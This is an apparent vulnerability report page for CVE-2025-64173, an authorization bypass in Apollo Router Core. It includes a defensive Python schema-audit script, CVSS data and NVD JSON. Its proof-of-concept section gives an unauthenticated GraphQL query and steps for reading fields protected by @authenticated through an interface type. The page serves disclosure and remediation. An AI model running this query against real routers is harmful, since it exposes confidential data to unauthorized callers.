Security Vulnerability Report
CVE-2025-64173 CVSS 7.5 HIGH

CVE-2025-64173

Published: 2025-11-06 21:15:44
Last Modified: 2026-04-15 00:35:42

Description

Apollo Router Core is a configurable graph router written in Rust that runs a federated supergraph using Apollo Federation 2. In versions 1.61.11 and below, and in 2.0.0-alpha.0 through 2.8.1-rc.0, unauthenticated queries could read data that the schema placed behind additional access controls. The router mishandled authorization directives on interface types and fields versus their implementing object types and fields: it applied the directives declared on the interface type or field, but ignored the directives declared on the implementing object types and fields when all implementations carried the same requirements. A schema that marks every object type implementing an interface as @authenticated while leaving the interface itself unmarked therefore let a query selecting those fields through the interface pass without the check. Apollo Router deployments whose supergraph defines @authenticated, @requiresScopes or @policy inconsistently across polymorphic types (object types that implement interface types) are affected; the bug depends on that inconsistency, since directives declared on the interface itself were applied. The impact is confidentiality only (CVSS 3.1 C:H/I:N/A:N; NVD lists CWE-288, Authentication Bypass Using an Alternate Path or Channel). This issue is fixed in versions 1.61.12 and 2.8.1.
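The affected configuration is a property of the schema, so it can be audited before or alongside the upgrade. The following Python script is an added example (not the advisory's or Apollo's code): it reads supergraph SDL and flags interfaces whose implementing object types, or their same-named fields, all carry @authenticated, @requiresScopes or @policy while the interface declares nothing, which is the pattern the description says the router failed to enforce. The schema text and type names (Node, Account, Device) are constructed for illustration, and the regex-based SDL reader is a heuristic: it assumes one definition per line and no `#` inside string literals, so treat its output as a triage list for the schema owner rather than a verdict. The second schema shows the consistent form, with the same directives declared on the interface as on its implementations, which the scanner no longer flags.

```python
"""Heuristic audit for the CVE-2025-64173 schema pattern (added example, not Apollo code).

Flags interfaces whose implementing object types, or their same-named fields, all
carry an authorization directive that the interface itself does not declare.
Standard library only. Assumptions: one definition per line, no '#' in strings.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# The three directives the advisory names as affected.
AUTH_DIRECTIVES = {"authenticated", "requiresScopes", "policy"}

HEADER_RE = re.compile(
    r"^(?P<kind>interface|type)\s+(?P<name>\w+)"
    r"(?:\s+implements\s+(?P<ifaces>\w+(?:\s*&\s*\w+)*))?"
    r"(?P<rest>[^{]*)\{"
)
FIELD_RE = re.compile(r"^(?P<name>\w+)(?:\([^)]*\))?\s*:\s*[^@]+(?P<rest>.*)$")
DIRECTIVE_RE = re.compile(r"@(\w+)")


@dataclass
class TypeDef:
    kind: str                                                  # "interface" or "type"
    name: str
    interfaces: List[str] = field(default_factory=list)
    directives: Set[str] = field(default_factory=set)          # type-level auth directives
    fields: Dict[str, Set[str]] = field(default_factory=dict)  # field name -> auth directives


@dataclass(frozen=True)
class Finding:
    interface: str
    field_name: str        # "" when the gap is at type level
    directives: frozenset  # required by every implementation, absent on the interface


def auth_dirs(text: str) -> Set[str]:
    """Authorization directive names present in a type header or field tail."""
    return {d for d in DIRECTIVE_RE.findall(text) if d in AUTH_DIRECTIVES}


def parse_sdl(sdl: str) -> Dict[str, TypeDef]:
    """Read interface/object definitions and their auth directives from SDL text."""
    types: Dict[str, TypeDef] = {}
    current = None
    for raw in sdl.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments (assumes no '#' in strings)
        if not line:
            continue
        header = HEADER_RE.match(line)
        if header:
            current = TypeDef(header["kind"], header["name"])
            if header["ifaces"]:
                current.interfaces = [i.strip() for i in header["ifaces"].split("&")]
            current.directives = auth_dirs(header["rest"])
            types[current.name] = current
        elif line.startswith("}"):
            current = None
        elif current is not None:
            fld = FIELD_RE.match(line)
            if fld:
                current.fields[fld["name"]] = auth_dirs(fld["rest"])
    return types


def find_inconsistent_interfaces(types: Dict[str, TypeDef]) -> List[Finding]:
    """Every implementation requires the same directive(s), the interface requires
    nothing: the case in which a vulnerable router enforced nothing for selections
    made through the interface. Directive arguments (scopes, policies) are not compared."""
    findings: List[Finding] = []
    for iface in (t for t in types.values() if t.kind == "interface"):
        impls = [t for t in types.values() if t.kind == "type" and iface.name in t.interfaces]
        if not impls:
            continue
        if not iface.directives:
            common = set.intersection(*(t.directives for t in impls))
            if common:
                findings.append(Finding(iface.name, "", frozenset(common)))
        for fname, iface_dirs in iface.fields.items():
            if iface_dirs:
                continue
            common = set.intersection(*(t.fields.get(fname, set()) for t in impls))
            if common:
                findings.append(Finding(iface.name, fname, frozenset(common)))
    return findings


# Constructed schemas, not a real supergraph. First: the affected (inconsistent) pattern.
VULNERABLE_SDL = """
interface Node {
  id: ID!
  sensitiveField: String
}
type Account implements Node @authenticated {
  id: ID!
  sensitiveField: String @requiresScopes(scopes: [["read:account"]])
}
type Device implements Node @authenticated {
  id: ID!
  sensitiveField: String @requiresScopes(scopes: [["read:device"]])
}
type Query {
  nodes: [Node]
}
"""

# Second: the same requirements declared on the interface as well, so nothing is flagged.
FIXED_SDL = VULNERABLE_SDL.replace(
    "interface Node {\n  id: ID!\n  sensitiveField: String\n}",
    "interface Node @authenticated {\n  id: ID!\n"
    "  sensitiveField: String @requiresScopes(scopes: [[\"read:node\"]])\n}",
)

if __name__ == "__main__":
    for label, sdl in (("vulnerable", VULNERABLE_SDL), ("fixed", FIXED_SDL)):
        for f in find_inconsistent_interfaces(parse_sdl(sdl)):
            where = f"{f.interface}.{f.field_name}" if f.field_name else f.interface
            print(f"[{label}] {where}: implementations require {sorted(f.directives)}, interface requires nothing")
```

Run it against the exported supergraph SDL of a router that is still on an affected version; each line names the interface (or interface field) where adding the directive restores a consistent declaration.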

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

Apollo Router Core < 1.61.12
Apollo Router Core 2.0.0-alpha.0 - 2.8.1-rc.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
graphql
# CVE-2025-64173 PoC - Apollo Router access-control bypass via interface types
# Type and field names below are placeholders, not taken from a real supergraph.
#
# Assumed schema: the interface declares no authorization directive, while
# every implementing object type does, e.g.
#   interface Node { id: ID!  sensitiveField: String }
#   type Account implements Node @authenticated { id: ID!  sensitiveField: String  confidentialData: String }
#   type Device  implements Node @authenticated { id: ID!  sensitiveField: String }
#   type Query   { nodes: [Node]  accounts: [Account] }
#
# Affected routers evaluated only the directives declared on the interface type
# and its fields; since the interface carried none, the identical @authenticated
# requirement on the implementations was ignored for selections made through it.

# Unauthenticated request (no Authorization header), selecting through the interface:
query interfaceBypass {
  nodes {                 # interface-typed field
    id
    sensitiveField        # protected on every implementation, returned anyway
    ... on Account {      # inline fragments on the implementations are covered too
      confidentialData
    }
  }
}

# For comparison: selecting the object type directly goes through a path on
# which the object-level directive is applied, so this query is rejected.
query directObjectQuery {
  accounts {              # [Account]; Account carries @authenticated
    id
    sensitiveField
  }
}

# Steps:
# 1. From the schema (introspection if exposed, or the published supergraph SDL),
#    find interface-typed fields whose implementing object types or fields carry
#    @authenticated / @requiresScopes / @policy while the interface itself does not.
# 2. Select the protected fields through the interface-typed field, optionally
#    narrowing with inline fragments on the implementations.
# 3. On an affected router (1.61.11 and below, or 2.0.0-alpha.0 through 2.8.1-rc.0)
#    the data is returned to the unauthenticated caller; on 1.61.12 / 2.8.1 the
#    selection is rejected according to the directive.

References

https://github.com/apollographql/router/security/advisories/GHSA-x33c-7c2v-mrj9 (vendor advisory)
https://github.com/apollographql/router/releases/tag/v2.8.1 (fixed release)
https://www.apollographql.com/docs/graphos/routing/security/authorization#authorization-directives (@authenticated, @requiresScopes and @policy documentation)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64173", "sourceIdentifier": "[email protected]", "published": "2025-11-06T21:15:43.660", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Apollo Router Core is a configurable graph router written in Rust to run a federated supergraph using Apollo Federation 2. In versions 1.61.11 below, as well as 2.0.0-alpha.0 through 2.8.1-rc.0, a vulnerability allowed for unauthenticated queries to access data that required additional access controls. Router incorrectly handled access control directives on interface types/fields and their implementing object types/fields, applying them to interface types/fields while ignoring directives on their implementing object types/fields when all implementations had the same requirements. Apollo Router customers defining @authenticated, @requiresScopes, or @policy directives inconsistently on polymorphic types (i.e., object types that implement interface types) are impacted. This issue is fixed in versions 1.61.12 and 2.8.1."}, {"lang": "es", "value": "Apollo Router Core es un router de grafos configurable escrito en Rust para ejecutar un supergrafo federado usando Apollo Federation 2. En versiones anteriores a la 1.61.11, así como de la 2.0.0-alpha.0 a la 2.8.1-rc.0, una vulnerabilidad permitía que consultas no autenticadas accedieran a datos que requerían controles de acceso adicionales. El router manejaba incorrectamente las directivas de control de acceso en tipos/campos de interfaz y sus tipos/campos de objeto implementadores, aplicándolas a los tipos/campos de interfaz mientras ignoraba las directivas en sus tipos/campos de objeto implementadores cuando todas las implementaciones tenían los mismos requisitos. Los clientes de Apollo Router que definen directivas @authenticated, @requiresScopes o @policy de manera inconsistente en tipos polimórficos (es decir, tipos de objeto que implementan tipos de interfaz) se ven afectados. Este problema está solucionado en las versiones 1.61.12 y 2.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "references": [{"url": "https://github.com/apollographql/router/releases/tag/v2.8.1", "source": "[email protected]"}, {"url": "https://github.com/apollographql/router/security/advisories/GHSA-x33c-7c2v-mrj9", "source": "[email protected]"}, {"url": "https://www.apollographql.com/docs/graphos/routing/security/authorization#authorization-directives", "source": "[email protected]"}]}}